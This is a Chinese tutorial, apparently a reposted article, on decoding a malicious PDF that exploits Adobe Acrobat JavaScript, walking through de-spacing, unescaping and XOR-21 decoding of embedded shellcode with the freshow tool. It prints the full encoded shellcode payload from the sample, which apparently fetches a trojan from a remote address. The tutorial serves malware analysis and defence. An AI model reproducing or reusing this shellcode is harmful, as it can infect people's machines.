网马解密大讲堂—网马解密高级篇(PDF解密)

安全 黑客攻防
黑客可以利用Adobe Acrobat”提供的Javascript脚本功能,执行隐藏在PDF文档中的恶意代码。那么,如何揪出它们呢?

一、pdf简介:

PDF(Portable Document Format)文件格式是Adobe公司开发的电子文件格式。这种文件格式可以运行在任何操作系统平台上,这一特点使它成为在Internet上进行电子文档发行和数字化信息传播的理想文档格式。越来越多的电子图书、产品说明、公司文告、网络资料、电子邮件开始使用PDF格式文件。

二、pdf漏洞简介

PDF是由“Adobe Acrobat”制作的,它存在一个攻击漏洞——可以在PDF文档中,利用“Adobe Acrobat”提供的Javascript脚本功能,执行任意攻击命令。

pdf网马和swf网马一样,解密工具都是可以使用htmldecoder工具,解密方法和网马解密高级篇(SWF解密)一样。今天讲解的这个pdf网马,可以直接使用freshow这个工具来解密,因为这个pdf包含的shellcode直接可以通过记事本看到。小技巧:对于pdf或swf格式的文件我们可以通过记事本的方式打开,直接查看文件的源代码,你会有惊奇的发现,尤其是网马解密,里面说不定就有你要的网马地址呢,呵呵。本次讲解同样不提供pdf文件的下载,以免不明网友,下载后运行而导致系统中招。

上图为此次解密pdf网马的源文件代码的部分截图

v a r Y T d o w n = u n e s c a p e ( " % u 9 " + " \ x 3 0 " + " 9 0 % u 9 " + " \ x 3 0 " + " 9 0 % u E 1 D 9 % u 3 4 D 9 % u 5 8 2 4 % u 5 8 5 8 % u 3 3 5 8 % u B 3 D B % u 0 3 1 C % u 3 1 C 3 % u 6 6 C 9 % u E 9 8 1 % u F A 6 5 % u 3 0 8 0 % u 4 0 2 1 % u F A E 2 % u 1 7 C 9 % u 2 1 2 2 % u 4 9 2 1 % u 0 1 2 1 % u 2 1 2 1 % u 2 1 4 B % u F 1 D E % u 2 1 9 8 % u 2 1 3 1 % u A A 2 1 % u C A D 9 % u 7 F 2 4 % u 8 5 D 2 % u F 1 D E % u D 7 C 9 % u D E D E % u C 9 D E % u 2 2 1 C % u 2 1 2 1 % u D 9 A A % u 1 9 C 9 % u 2 1 2 1 % u C 9 2 1 % u 2 0 6 C % u 2 1 2 1 % u 6 7 C 9 % u 2 1 2 1 % u C 9 2 1 % u 2 2 F A % u 2 1 2 1 % u D 9 A A % u 0 3 C 9 % u 2 1 2 1 % u C 9 2 1 % u 2 0 6 5 % u 2 1 2 1 % u 1 1 C 9 % u 2 1 2 1 % u C 9 2 1 % u 2 2 A 8 % u 2 1 2 1 % u D 9 A A % u 2 D C 9 % u 2 1 2 1 % u C 9 2 1 % u 2 0 4 0 % u 2 1 2 1 % u 3 B C 9 % u 2 1 2 1 % u C A 2 1 % u 7 2 7 9 % u F D A A % u 4 B 7 2 % u 4 9 6 1 % u 3 1 2 1 % u 2 1 2 1 % u C 9 7 6 % u 2 3 9 0 % u 2 1 2 1 % u C 4 C 9 % u 2 1 2 1 % u 7 9 2 1 % u 7 2 E 2 % u F D A A % u 4 B 7 2 % u 4 9 0 1 % u 3 1 2 1 % u 2 1 2 1 % u C 9 7 6 % u 2 3 B 8 % u 2 1 2 1 % u E C C 9 % u 2 1 2 1 % u 7 9 2 1 % u 7 6 E 2 % u 1 D C 9 % u 2 1 2 5 % u A A 2 1 % u 1 2 D 9 % u 6 8 E 8 % u E 1 1 2 % u E 2 9 1 % u D 3 D D % u A C 8 F % u D E 6 6 % u E 2 7 E % u 1 F 7 A % u 2 6 E 7 % u 1 F 9 9 % u 7 E A 8 % u 4 7 2 0 % u E 6 1 F % u 2 4 6 6 % u C 1 D E % u C 8 E 2 % u 2 5 B 4 % u 2 1 2 1 % u A 0 7 A % u 3 5 C D % u 2 1 2 0 % u A A 2 1 % u 1 F F 5 % u 2 3 E 6 % u 4 C 4 2 % u 0 1 4 5 % u E 6 1 F % u 2 5 6 3 % u 4 2 0 E % u 0 3 0 1 % u E 3 A 2 % u 1 2 2 9 % u 7 1 E 1 % u 4 9 7 1 % u 2 0 2 5 % u 2 1 2 1 % u 7 2 7 3 % u C 9 7 1 % u 2 2 E 0 % u 2 1 2 1 % u F 1 D E % u D D A A % u E 6 A A % u E 1 A 2 % u 1 F 2 9 % u 3 9 A B % u F A A 5 % u 2 2 5 5 % u C A 6 1 % u 1 F D 7 % u 2 1 E 7 % u 1 2 0 3 % u 1 F F 3 % u 7 1 A 9 % u A 2 2 0 % u 7 5 C D % u E 1 1 2 % u F A 1 2 % u E D A A % u D 9 A 2 % u 5 C 7 5 % u 1 F 2 8 % u 3 D A 8 % u A 2 2 0 % u 2 5 E 1 % u D 3 C A % u E D A A % u F 8 A A % u E 2 A 2 % u 1 2 3 1 % u 1 F E 1 % u 6 2 E 6 % u 2 0 0 D % u 2 1 2 1 % u 7 0 2 1 % u 7 1 7 2 % u 7 1 7 1 % u 7 1 7 1 % u 7 6 7 1 % u C 9 7 1 % u 2 2 1 8 % u 2 1 2 1 % u 3 8 C 9 % u 2 1 2 1 % u 4 5 2 1 % u 2 5 8 0 % u 2 1 2 1 % u A C 2 1 % u 4 1 8 1 % u D E D E % u C 9 D E % u 2 2 1 6 % u 2 1 2 1 % u F A 1 2 % u 7 2 7 2 % u 7 2 7 2 % u F 1 D E % u 1 9 A 1 % u A 1 C 9 % u C 8 1 9 % u 2 E 5 4 % u 5 9 A 0 % u B 1 2 4 % u B 1 B 1 % u 5 5 B 1 % u 7 4 2 7 % u C D A A % u 6 1 A C % u D E 2 4 % u C 9 C 1 % u D E 0 F % u D E D E % u C 9 E 2 % u D E 0 9 % u D E D E % u 3 0 9 9 % u 2 5 2 0 % u E 3 A 1 % u 2 1 2 D % u 3 A C 9 % u D E D E % u 1 2 D E % u 7 1 E 1 % u C 9 7 5 % u 2 1 7 5 % u 2 1 2 1 % u C 9 7 1 % u 2 3 A A % u 2 1 2 1 % u F 1 D E % u A 1 1 7 % u 0 5 1 D % u 5 6 2 1 % u C 9 2 B % u 2 3 6 0 % u 2 1 2 1 % u D E 1 2 % u D E 7 6 % u C 9 F 1 % u 2 0 D A % u 2 1 2 1 % u D E 4 9 % u 2 1 2 1 % u D E 2 1 % u C 9 F 1 % u D F C 9 % u D E D E % u 7 6 7 2 % u 1 2 7 7 % u 7 1 E 1 % u C 9 7 5 % u 2 1 3 F % u 2 1 2 1 % u C 9 7 1 % u 2 3 7 4 % u 2 1 2 1 % u F 1 D E % u A 1 1 7 % u 0 5 1 D % u 5 6 2 1 % u C 9 2 B % u 2 3 2 A % u 2 1 2 1 % u D E 1 2 % u D E 7 6 % u 7 9 F 1 % u 7 E 7 F % u E 2 7 A % u 2 3 C A % u E 2 7 9 % u D 8 C 9 % u D E D E % u 7 7 D E % u A 2 7 6 % u 2 9 C D % u D D A A % u 2 9 4 B % u 1 F 7 6 % u 5 6 D E % u C 9 3 5 % u 2 3 7 C % u 2 1 2 1 % u F 1 D E % u D D A A % u 4 0 4 9 % u 4 4 4 C % u 4 9 2 1 % u 6 4 6 8 % u 5 3 6 7 % u D 5 A A % u 2 9 9 8 % u 2 1 2 1 % u D 2 2 1 % u 5 4 8 7 % u 4 B 0 E % u 1 F 2 1 % u 5 5 D E % u 0 1 0 5 % u 0 5 C 9 % u 2 1 2 3 % u D E 2 1 % u A A F 1 % u C 9 D 9 % u 2 0 E A % u 2 1 2 1 % u F 1 D E % u D 9 1 A % u 2 9 5 5 % u A A 1 7 % u 0 5 6 5 % u 1 F 0 1 % u 2 1 D E % u D E 1 F % u 0 5 5 5 % u C 9 3 D % u 2 0 C E % u 2 1 2 1 % u F 1 D E % u E 5 A 2 % u 7 E 3 1 % u 9 9 7 F % u 2 1 2 0 % u 2 1 2 1 % u 4 9 E 2 % u 4 F 4 E % u 2 1 2 1 % u 5 4 4 9 % u 4 D 5 3 % u C A 4 C % u A C 3 4 % u 0 5 6 5 % u 7 1 2 5 % u 0 3 C 9 % u D E D F % u 7 1 D E % u 6 B C 9 % u 2 1 2 3 % u C 8 2 1 % u D F C 3 % u D E D E % u C 7 C 9 % u D E D E % u A 2 D E % u 2 9 E 5 % u 4 B E 2 % u 4 9 4 D % u 5 5 4 F % u 4 D 4 5 % u 3 4 C A % u 6 5 A C % u 2 5 0 5 % u C 9 7 1 % u D C D A % u D E D E % u C 9 7 1 % u 2 3 0 2 % u 2 1 2 1 % u 9 A C 8 % u D E D F % u C 9 D E % u D E C 7 % u D E D E % u E 5 A 2 % u E 2 2 9 % u 1 2 4 9 % u 2 1 1 3 % u 4 9 2 1 % u 5 2 5 4 % u 5 3 4 4 % u 3 4 C A % u 6 5 A C % u 2 5 0 5 % u C 9 7 1 % u D C F 0 % u D E D E % u C 9 7 1 % u 2 0 D 8 % u 2 1 2 1 % u B 0 C 8 % u D E D F % u C 9 D E % u D E C 7 % u D E D E % u E 5 A 2 % u E 2 2 9 % u 4 2 4 9 % u 5 6 5 7 % u 4 9 2 1 % u 4 9 5 2 % u 4 E 4 5 % u 3 4 C A % u 6 5 A C % u 2 5 0 5 % u C 9 7 1 % u D C 8 6 % u D E D E % u C 9 7 1 % u 2 0 E E % u 2 1 2 1 % u 4 6 C 8 % u D E D F % u C 9 D E % u D E C 7 % u D E D E % u E 5 A 2 % u E 2 2 9 % u 5 7 4 9 % u 5 9 4 6 % u C A 2 1 % u A C 3 4 % u 0 5 6 5 % u 7 1 2 5 % u A 3 C 9 % u D E D C % u 7 1 D E % u 8 B C 9 % u 2 1 2 0 % u C 8 2 1 % u D F 6 3 % u D E D E % u C 7 C 9 % u D E D E % u A 2 D E % u 2 5 E 5 % u C 9 E 2 % u 2 0 8 A % u 2 1 2 1 % u 3 A 4 9 % u 6 7 E 7 % u 7 1 5 8 % u E 7 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 B 6 % u 2 1 2 1 % u C D 4 9 % u 2 2 B 6 % u 7 1 2 D % u 9 3 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 A 2 % u 2 1 2 1 % u 8 B 4 9 % u 2 C D D % u 7 1 5 D % u B F C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 4 E % u 2 1 2 1 % u C C 4 9 % u C E 7 7 % u 7 1 1 7 % u A B C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 7 A % u 2 1 2 1 % u D 1 4 9 % u 2 5 A B % u 7 1 7 E % u 5 7 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F D 6 % u D E D E % u 5 9 4 9 % u F A 4 9 % u 7 1 3 D % u 4 3 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 1 2 % u 2 1 2 1 % u C E 4 9 % u C 1 E F % u 7 1 4 1 % u 6 F C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 3 E % u 2 1 2 1 % u 9 1 4 9 % u 0 C 6 8 % u 7 1 F A % u 1 B C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D E 1 7 % u D E D E % u 8 A 4 9 % u B A 7 F % u 7 1 3 F % u 0 7 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 8 6 % u D E D E % u 7 8 4 9 % u A 0 B 6 % u 7 1 2 3 % u 3 3 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 1 C 2 % u 2 1 2 1 % u 5 F 4 9 % u C 3 F 9 % u 7 1 5 2 % u D F C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 1 E E % u 2 1 2 1 % u B F 4 9 % u 9 A D 8 % u 7 1 1 4 % u C B C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F B 3 % u D E D E % u 7 6 4 9 % u 9 4 8 1 % u 7 1 9 A % u F 7 C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 5 F % u D E D E % u 3 B 4 9 % u 3 F 5 B % u 7 1 2 3 % u E 3 C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 4 B % u D E D E % u C 1 4 9 % u 1 1 7 A % u 7 1 B 5 % u 8 F C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 7 7 % u D E D E % u B 6 4 9 % u C 3 E 8 % u 7 1 8 2 % u B B C 9 % u 2 1 2 1 " + " % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 6 3 % u D E D E % u 4 9 4 9 % u E 4 0 5 % u 7 1 9 2 % u A 7 C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 " + " % u C 9 E 2 % u 2 1 7 6 % u 2 1 2 1 % u 5 3 4 9 % u 9 2 D F % u 7 1 3 7 % u 5 3 C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 6 5 % u D E D E % u 3 2 C A % u 4 4 4 B % u C 9 7 1 % u D A D 6 % u D E D E % u C 9 7 1 % u D F 8 A % u D E D E % u 9 6 C 8 % u D E D D % u C 9 D E % u D E C 9 % u D E D E % u C 9 E 2 % u D C 8 8 % u D E D E % u 6 E 4 9 % u 6 E C E % u 7 1 2 4 % u 1 F C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 1 2 E % u 2 1 2 1 % u A F 4 9 % u 2 F 6 F % u 7 1 C D % u 0 B C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u 1 2 E 2 % u 4 5 E 1 % u 6 1 A A % u A 4 1 1 % u 5 9 E 1 % u 1 F 3 1 % u 6 1 A A % u 1 F 2 D % u 5 1 A A % u 8 C 3 D % u A A 1 F % u 2 9 6 1 % u C A E 2 % u 1 F 2 A " + " % u 6 1 A A % u A 2 1 5 % u 5 D E 1 % u A A 1 F % u 1 D 6 1 % u 4 1 E 2 % u A A 1 7 % u 0 5 4 D % u 1 7 0 5 % u 6 4 A A % u 1 7 1 D % u 7 5 A A % u 5 9 2 4 % u F 4 2 2 % u A A 1 F % u 3 9 6 B % u A A 1 F % u 0 1 7 B % u F C 2 2 % u 1 A C 2 % u 1 F 6 8 % u 1 5 A A % u 2 2 A A % u 1 2 D 4 % u 1 2 D E % u D D E 1 % u A 5 8 D % u 5 5 E 1 % u E 0 2 6 % u 2 C E E % u D 9 2 2 % u D 5 C A % u 1 A 1 7 % u 0 5 5 D % u 5 4 0 9 % u 1 F F E % u 7 B A A % u 2 2 0 5 % u 4 7 F C % u A A 1 F % u 6 A 2 D % u A A 1 F % u 3 D 7 B % u F C 2 2 % u A A 1 F % u A A 2 5 % u E 4 2 2 % u A 8 1 7 % u 0 5 6 5 % u 4 0 3 D % u C 9 E 2 % u D A 4 7 % u D E D E % u 5 5 4 9 % u 5 1 5 5 % u 0 e 1 b % u 1 4 0 e % u 1 3 4 d % u 1 9 4 e % u 4 2 0 f % u 4 c 4 e % u 5 6 0 e % u 4 3 4 4 % u 1 2 0 e % u 4 4 0 f % u 4 4 5 9 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 0 0 2 1

大家是否看着上述代码有些眼熟吧,还记得前期我们讲解shellcode加密的特征嘛,Shellcode网马特征:以相同分隔符(一般为%u)分隔的4位一组的十六进制字符串。这段代码看着可能有些乱,需要我们先来简单的处理一下。我们先来观察一下上述代码的确和shellcode特征类似,不过其中有很多的空格,ok,那么我们将这些空格取消后再看一下代码。

在这里我们又要用到freshow的过滤功能NULS,NULS的功能就是将代码中的空格过滤掉,使得代码更易阅读。 将上述代码粘贴至freshow的上操作区域,在过滤选项中选择NULS后点击filter按钮,具体操作详见截图。

取消空格在下操作区域显示代码的截图。 接下来点击up按钮,将代码上翻至上操作区域,进行shellcode解密(两次esc)

上图为两次esc后截图,我们看到并没有网马的地址,欲知后事如何,接着往下看

为什么两次esc后没有网马地址呢,我们再来仔细分析一下这个shellcode,里面有很多的21,其实这是一个带密钥(XOR21)shellcode,而密钥就是21。ok,我们再来解一下这个shellcode,先进行一次esc后,将代码上翻至上操作区域,在进行二次esc之前,输入密钥21后再esc,详见截图:

最终解密结果详见下图:

 

责任编辑:Oo小孩儿 来源: 安全中国网
相关推荐

2013-11-25 09:10:55

节能以太网EEE

2010-10-12 14:01:01

2010-05-06 14:33:30

Unix系统交换区

2020-10-09 07:40:30

黑客组织

2017-02-21 13:35:00

华为

2010-06-01 19:47:29

SVN分支与合并

2015-11-10 15:14:20

CIO时代网

2013-11-25 15:43:14

Linux命令top命令

2009-12-17 18:04:59

Ruby调用Oracl

2009-12-17 09:31:02

Ruby on Rai

2009-04-24 20:54:00

2010-09-01 11:06:17

维基解密

2014-09-11 09:15:29

H3C

2010-08-19 10:32:07

BM DB2数据复制

2009-02-03 15:37:50

2012-08-30 10:06:28

2011-05-09 09:28:12

投影机采购

2023-10-13 08:20:02

Spring线程池id

2010-12-21 16:29:26

客户体验中心数据中心
点赞
收藏

51CTO技术栈公众号